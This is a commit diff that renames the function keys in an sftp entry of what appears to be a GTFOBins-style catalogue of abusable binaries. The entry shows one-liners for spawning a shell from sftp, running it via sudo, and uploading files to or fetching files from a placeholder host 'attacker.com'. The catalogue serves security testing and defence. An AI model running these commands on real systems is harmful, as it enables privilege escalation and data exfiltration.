Adopt new function names
This commit is contained in:
@@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
!/bin/sh
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
put file_to_send file_to_save
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RHOST=user@attacker.com
|
||||
sftp $RHOST
|
||||
get file_to_get file_to_save
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sudo sftp $HOST
|
||||
|
||||
Reference in New Issue
Block a user